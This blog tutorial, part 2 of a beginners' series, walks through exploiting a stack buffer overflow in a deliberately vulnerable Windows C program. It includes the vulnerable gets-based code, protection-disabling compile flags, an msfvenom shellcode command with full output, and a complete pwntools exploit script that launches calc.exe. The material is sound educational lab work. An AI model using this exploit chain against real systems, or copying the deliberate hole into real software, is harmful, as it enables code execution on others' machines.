Mirrai

Posted on Apr 1 • Edited on May 28

Buffer Overflows on x64 Windows: A Practical Beginners Guide (Part 2): Exploitation

#beginners #tutorial #infosec #security

Introduction

Welcome back. Mirrai here. In part 1 we covered the theory. The stack, RIP, and what a buffer overflow actually is. Now we get our hands dirty. By the end of this guide you should have a working exploit that gives you control of RIP and redirects execution to your own code.
Before we start, make sure you have x64dbg and pwntools installed from part 1. You'll also need the vulnerable program we wrote. If you haven't read part 1, go do that first. Buckle up, this might take a while.

For your convenience, here's the old vuln program code

#include <stdio.h>
#include <windows.h>

int main() {
   setvbuf(stdout, NULL, _IONBF, 0);
   DWORD old_protect;
   char username[500] = {0};

   VirtualProtect(username, 500, PAGE_EXECUTE_READWRITE, &old_protect);

   printf("What is your username?: ");
   gets(username);
   printf("%s %s\n", "Hello", username);
}

Compilation

Before we can exploit anything we need to compile our vulnerable program with protections disabled. To be clear, buffer overflows are the first step to learn in binary exploitation and even then, they can be complicated even without protections lol. But trust me it gets easier from here.

Now, compile with these arguments from wherever you want:
gcc vuln.c -o vuln.exe -fno-stack-protector -no-pie

-fno-stack-protector disables stack canaries. stack canaries work by placing random values between your buffer and the return address that terminate the program if modified. Fun fact, miners went to caves with canaries and if the bird died it meant the cave was unsafe. Same logic here. -no-pie disables position independent executables so the binary loads at a consistent address every run, which makes our life significantly easier.

Loading the exe with x64dbg

Open x64dbg and just drag and drop the exe into it. You should see a screen like this.

The labeled buttons are what you'll use most. The first runs the program until a breakpoint is hit. The second steps through one instruction at a time and follows into function calls. The third does the same but steps over calls without entering them.

Finding Main

Now that we are in the debugger we need to find our program main function. You might think that this is were are starting from but no. When you run a program, the OS loader does some setup before your program is run so we need to know the difference between this initialisation code and the main code.

Method 1: String search

Since we know string we used in our program we can just find were it shows up in the instructions list and find main that way. Press Shift + D to open a window to search for your program's strings.

Here, if we double click on any of the string we used like "Hello", "what is your username?: ", "%s %s\n" we will end up in main.

Method 2: Exit function (Gcc/Clang specific)

While researching i found that if your using the c runtime that the function call before the exit function is your main. This seems to be the way the gcc compiler arranges it and it will probably be different in MSVC.

In the image above, main is the call before the exit function.

Generating the Cyclic Pattern

It's time to switch to python. create a python file with this code

from pwn import *
pattern = cyclic(600)
print(pattern)

This creates a pattern that will overwrite the return address. Store this, you are gonna need it later. Depending on what overwrote the return address we can find the distance or offset from the buffer start address to the return address. Why do we need the offset you may ask? Because we need to overwrite enough data to get to the start of the memory address that contains the ret address so we can replace it with the start of our buffer. Doing so will change RIP to the buffer start address and execute whatever was written there when ret is executed.

Finding the return address

How do we actually find the return address? if you used method 2 to find main the return address is the instruction next to the main function call lol. if you used method 1 do not fret, set a breakpoint (F2) at the start of main (the push rbp instruction) then restart the program with the Ctrl + F2 then run till it stops at the break point. The return address is the code pointer pointing back to the calling function, located at the very bottom of your stack allocation (remember stack grows down).

Btw that number (one in my case) above the return address(in value of the address) are the number of arguments that your program has. I recommend you read further on the full stack layout such as RBP but we don't need those to do this tutorial.

Overwriting the return address

Make a breakpoint at the instruction after the gets call. Now return to your cmd program that has been chilling at the background for a while then copy paste the pattern you got from pwntools and keep a note on what memory address the ret address is on. press enter and you should see the ret address has been overwritten.

If the program crashes before breakpoint after gets try to reduce the size of the cyclic() pattern

Here you can see the pattern 6661616B6661616A. now I will process this value in pwntools:

print(cyclic_find(0x6661616B6661616A))

I got 536 although your number may differ depending on your environment and compiler.

Getting the Shellcode

We need shellcode to execute once we control RIP. We'll use msfvenom to generate a payload that launches calc.exe.

msfvenom -p windows/x64/exec CMD=calc.exe -b "\x0a\x0d" -f python

The -b "\x0a\x0d" flag tells msfvenom to avoid generating bytes that gets() would interpret as line endings and stop reading early. \x0a is newline and \x0d is carriage return both of which would terminate input before the full payload is written. These are called bad chars, characters the input function won't read past. Typically null (0x0) is also a bad char but gets() reads it fine.

Here's the full output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 2 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 319 (iteration=0)
x64/xor chosen with final size 319
Payload size: 319 bytes
Final size of python file: 1584 bytes
buf =  b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xdd\xff\xff\xff\x48\x8d"
buf += b"\x05\xef\xff\xff\xff\x48\xbb\x4d\x13\x13\x90\xd8"
buf += b"\xc5\xbe\x60\x48\x31\x58\x27\x48\x2d\xf8\xff\xff"
buf += b"\xff\xe2\xf4\xb1\x5b\x90\x74\x28\x2d\x7e\x60\x4d"
buf += b"\x13\x52\xc1\x99\x95\xec\x31\x1b\x5b\x22\x42\xbd"
buf += b"\x8d\x35\x32\x2d\x5b\x98\xc2\xc0\x8d\x35\x32\x6d"
buf += b"\x5b\x98\xe2\x88\x8d\xb1\xd7\x07\x59\x5e\xa1\x11"
buf += b"\x8d\x8f\xa0\xe1\x2f\x72\xec\xda\xe9\x9e\x21\x8c"
buf += b"\xda\x1e\xd1\xd9\x04\x5c\x8d\x1f\x52\x42\xd8\x53"
buf += b"\x97\x9e\xeb\x0f\x2f\x5b\x91\x08\x4e\x3e\xe8\x4d"
buf += b"\x13\x13\xd8\x5d\x05\xca\x07\x05\x12\xc3\xc0\x53"
buf += b"\x8d\xa6\x24\xc6\x53\x33\xd9\xd9\x15\x5d\x36\x05"
buf += b"\xec\xda\xd1\x53\xf1\x36\x28\x4c\xc5\x5e\xa1\x11"
buf += b"\x8d\x8f\xa0\xe1\x52\xd2\x59\xd5\x84\xbf\xa1\x75"
buf += b"\xf3\x66\x61\x94\xc6\xf2\x44\x45\x56\x2a\x41\xad"
buf += b"\x1d\xe6\x24\xc6\x53\x37\xd9\xd9\x15\xd8\x21\xc6"
buf += b"\x1f\x5b\xd4\x53\x85\xa2\x29\x4c\xc3\x52\x1b\xdc"
buf += b"\x4d\xf6\x61\x9d\x52\x4b\xd1\x80\x9b\xe7\x3a\x0c"
buf += b"\x4b\x52\xc9\x99\x9f\xf6\xe3\xa1\x33\x52\xc2\x27"
buf += b"\x25\xe6\x21\x14\x49\x5b\x1b\xca\x2c\xe9\x9f\xb2"
buf += b"\xec\x4e\xd8\x62\xc4\xbe\x60\x4d\x13\x13\x90\xd8"
buf += b"\x8d\x33\xed\x4c\x12\x13\x90\x99\x7f\x8f\xeb\x22"
buf += b"\x94\xec\x45\x63\x35\x0b\xc2\x1b\x52\xa9\x36\x4d"
buf += b"\x78\x23\x9f\x98\x5b\x90\x54\xf0\xf9\xb8\x1c\x47"
buf += b"\x93\xe8\x70\xad\xc0\x05\x27\x5e\x61\x7c\xfa\xd8"
buf += b"\x9c\xff\xe9\x97\xec\xc6\xf3\xb9\xa9\xdd\x4e\x28"
buf += b"\x6b\x76\x90\xd8\xc5\xbe\x60"

Calculating the Buffer Start Address

We need to know where in memory our username buffer starts so we can point RIP at it.

Take the memory address of the return address location not the value stored there then subtract it by the offset to get the buffer starting address. In my case it's 0x00000000005FFC80 because 0x00000000005FFE98 - 536 = 0x00000000005FFC80.

buffer_start = return_address_location - offset

The Exploitation Code

Before running: Replace buffer_size and ret_addr, and the buf shellcode with your own values. The addresses in this script are specific to my machine and will not work on yours. Use the offset and buffer start address you calculated in the previous steps.

from pwn import *

vuln_bin = "vuln.exe"
stack_adj = b"\x48\x81\xec\x00\x04\x00\x00"
current_dir = os.path.dirname(__file__)

vuln_bin_path = os.path.join(current_dir, vuln_bin)

nop = b"\x90"
buffer_size = 536

ret_addr = p64(0x00000000005FFC80)

buf =  b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xdd\xff\xff\xff\x48\x8d"
buf += b"\x05\xef\xff\xff\xff\x48\xbb\x4d\x13\x13\x90\xd8"
buf += b"\xc5\xbe\x60\x48\x31\x58\x27\x48\x2d\xf8\xff\xff"
buf += b"\xff\xe2\xf4\xb1\x5b\x90\x74\x28\x2d\x7e\x60\x4d"
buf += b"\x13\x52\xc1\x99\x95\xec\x31\x1b\x5b\x22\x42\xbd"
buf += b"\x8d\x35\x32\x2d\x5b\x98\xc2\xc0\x8d\x35\x32\x6d"
buf += b"\x5b\x98\xe2\x88\x8d\xb1\xd7\x07\x59\x5e\xa1\x11"
buf += b"\x8d\x8f\xa0\xe1\x2f\x72\xec\xda\xe9\x9e\x21\x8c"
buf += b"\xda\x1e\xd1\xd9\x04\x5c\x8d\x1f\x52\x42\xd8\x53"
buf += b"\x97\x9e\xeb\x0f\x2f\x5b\x91\x08\x4e\x3e\xe8\x4d"
buf += b"\x13\x13\xd8\x5d\x05\xca\x07\x05\x12\xc3\xc0\x53"
buf += b"\x8d\xa6\x24\xc6\x53\x33\xd9\xd9\x15\x5d\x36\x05"
buf += b"\xec\xda\xd1\x53\xf1\x36\x28\x4c\xc5\x5e\xa1\x11"
buf += b"\x8d\x8f\xa0\xe1\x52\xd2\x59\xd5\x84\xbf\xa1\x75"
buf += b"\xf3\x66\x61\x94\xc6\xf2\x44\x45\x56\x2a\x41\xad"
buf += b"\x1d\xe6\x24\xc6\x53\x37\xd9\xd9\x15\xd8\x21\xc6"
buf += b"\x1f\x5b\xd4\x53\x85\xa2\x29\x4c\xc3\x52\x1b\xdc"
buf += b"\x4d\xf6\x61\x9d\x52\x4b\xd1\x80\x9b\xe7\x3a\x0c"
buf += b"\x4b\x52\xc9\x99\x9f\xf6\xe3\xa1\x33\x52\xc2\x27"
buf += b"\x25\xe6\x21\x14\x49\x5b\x1b\xca\x2c\xe9\x9f\xb2"
buf += b"\xec\x4e\xd8\x62\xc4\xbe\x60\x4d\x13\x13\x90\xd8"
buf += b"\x8d\x33\xed\x4c\x12\x13\x90\x99\x7f\x8f\xeb\x22"
buf += b"\x94\xec\x45\x63\x35\x0b\xc2\x1b\x52\xa9\x36\x4d"
buf += b"\x78\x23\x9f\x98\x5b\x90\x54\xf0\xf9\xb8\x1c\x47"
buf += b"\x93\xe8\x70\xad\xc0\x05\x27\x5e\x61\x7c\xfa\xd8"
buf += b"\x9c\xff\xe9\x97\xec\xc6\xf3\xb9\xa9\xdd\x4e\x28"
buf += b"\x6b\x76\x90\xd8\xc5\xbe\x60"

payload = stack_adj + buf + nop * (buffer_size - len(buf) - len(stack_adj))  + ret_addr

p = process([vuln_bin_path])

input("debug pause press enter: ")

p.sendlineafter(b"What is your username?: ", payload)

p.wait()

Here's what this payload does in a high level:

stack_adj is the assembly instruction sub rsp, 0x400 encoded as raw bytes. When main returns, RSP moves above our shellcode. If any function called by the shellcode allocates stack space it could overwrite our own code mid-execution. This stack adjustment pushes RSP safely below the shellcode before anything runs, giving it clean stack space to work with.
The shellcode follows immediately after the adjustment.

NOP bytes (\x90) pad the remaining space between the end of the shellcode and the return address. NOPs do nothing, They just slide execution forward until it hits the shellcode. They also give us a landing cushion in case our buffer address calculation is slightly off.
Finally ret_addr overwrites the saved return address with the start of our buffer. When main returns RIP loads this value and execution jumps to our stack adjustment followed by the shellcode.

If everything worked you'll see calc.exe pop open. If not it's time to debug. I put input("debug pause press enter: ") for a reason lol. When you run the script And get to that prompt, press alt+a to attach to your program. When attached press enter. Ideally you set a breakpoint after gets has run then you can examine the stack and the return address to see what's going on.

Btw I uploaded all files I used for this tutorial on my GitHub. Check it here

The End

That's a complete stack buffer overflow exploit on x64 Windows with protections disabled. We found the offset, controlled RIP, and redirected execution to shellcode we controlled.

Don't feel bad if it took a few tries to get working. It took me a few too lol. The pieces click once you see the whole chain working end to end.

Future parts, if I decide to make them, will cover the mitigations we removed here such as stack canaries, ASLR, and DEP and techniques to bypass them. Bye for now and feel free to ask any questions if your stuck somewhere. I'm always willing to help.

DEV Community